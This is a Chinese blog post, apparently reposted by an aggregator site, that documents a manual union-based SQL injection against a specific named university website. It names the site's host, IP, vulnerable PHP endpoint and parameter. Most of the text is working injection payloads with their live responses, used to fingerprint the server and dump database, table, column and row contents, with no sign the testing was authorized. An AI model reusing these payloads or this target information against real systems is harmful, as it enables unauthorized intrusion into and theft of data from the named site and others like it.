记一次MySQL手工注入案例

来源：互联网发布：上古卷轴5精灵捏脸数据编辑：程序博客网时间：2024/05/22 18:23

记录一次手动注入学校某站MySQL的过程

信息收集

发现方式

子域名扫描 -> 导入awvs -> 批量扫blind-injection

url

http://home.bjtu.edu.cn/

info(whatweb)

202.112.147.124(学校内网)
Apache/2.4.9
Win64
PHP/5.5.12

parameter

http://home.bjtu.edu.cn/ctrl/vote/ajax_vote_response.php?req=3&tid=1
- tid (GET)

测试

确认注入 =>tid

分号报错，有回显：
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 6

判断版本 >4.0

and ord(mid(version(),1,1))>51
返回正常，说明版本>4.0，支持union

查字段数 =>5

order by+二分法

tid=1 and order by 6 => Unknown column ‘6’ in ‘order clause’
tid=1 and order by 5 => [{“item_title”:”3”,”item_id”:”3”,”item_count”:36},{“item_title”:”4”,”item_id”:”4”,”item_count”:22},{“item_title”:”5”,”item_id”:”5”,”item_count”:66},{“item_title”:”\u5b66\u4e60\u8bdd\u98981-\u89c2\u70b92”,”item_id”:”2”,”item_count”:84},{“item_title”:”\u5b66\u4e60\u8bdd\u98981-\u89c2\u70b9\u4e00”,”item_id”:”1”,”item_count”:103}]

union+select

tid=1 and 1=2 union select 1,2,3,4,5...,n
- 错误输出：
The used SELECT statements have a different number of columns
- 正确输出：
[{"item_title":"2","item_id":"1","item_count":4}]

信息收集

and 1=2 union select [function],-1,-1,-1,-1
- version() 查询数据库版本=>5.6.17
- database() 查询当前连接的数据库=>stu
- @@version_compile_os 查询当前操作系统=>Win64
- @@datadir 查询读取数据库路径=>c:\wamp\bin\mysql\mysql5.6.17\data\
- @@basedir 查询MYSQL安装路径

获取所有库名

in

select * from stu where tid=1    and 1=2 union select SCHEMA_NAME,-1,-1,-1,-1 from information_schema.columns;或者：select * from stu where tid=1    and 1=2 union select table_schema,-1,-1,-1,-1 from information_schema.columns;

out

[{"item_title":"-1","item_id":"information_schema","item_count":-1},{"item_title":"-1","item_id":"mysql","item_count":-1},{"item_title":"-1","item_id":"performance_schema","item_count":-1},{"item_title":"-1","item_id":"stu","item_count":-1},{"item_title":"-1","item_id":"student","item_count":-1}]

获取stu中的表名

in(含处理输出格式)

select * from stu where tid=1    and 1=2 union select concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-1,-1 from information_schema.columns where table_schema="stu";

out

[{"item_title":"-1","item_id":"[xxoo]fsa_about,fsa_contest_and_project,fsa_css3_example,fsa_nav_feedback,fsa_nav_feedback_type,fsa_nav_list,fsa_nav_page_list,fsa_nav_page_list_1,fsa_nav_page_list_395,fsa_nav_page_list_396,fsa_nav_page_list_398,fsa_nav_page_list_399,fsa_nav_page_list_400,fsa_nav_page_list_401,fsa_nav_page_list_402,fsa_nav_page_list_403,fsa_nav_page_list_404,fsa_nav_...[xxoo]","item_count":-1}]

获取fsa_vote_topic中的列名

in

and 1=2 union select concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT column_name),0x5B78786F6F5D),-1,-1,-1,-1 from information_schema.columns where table_name='fsa_vote_topic'

out

{"item_title":"-1","item_id":"[xxoo]topic_id,topic_title,topic_type_id[xxoo]","item_count":-1}]

确定字段数

in

and 1=2 union select concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-1,-1,-1,-1 from fsa_vote_topic

out

[{"item_title":"-1","item_id":"[xxoo]12[xxoo]","item_count":-1}]

获取字段值

in

依次改变limit值可爆出多列内容

and 1=0 union select concat(0x5B78786F6F5D,topic_title,0x5B78786F6F5D),-1,-1,-1,-1 from fsa_vote_topic LIMIT 0,1

out

[{"item_title":"-1","item_id":"[xxoo]\u5b66\u4e60\u8bdd\u98981[xxoo]","item_count":-1}]

解码后为=> 学习话题1

注意

在写payload时，特别注意函数中的参数不用加引号，而使用等号赋值时需要加引号．

不加的情况(topic_title)(fsa_vote_topic):
concat(0x5B78786F6F5D,topic_title,0x5B78786F6F5D)
from fsa_vote_topic LIMIT 0,1

加的情况(有等号赋值时)
here table_name='fsa_vote_topic'

0 0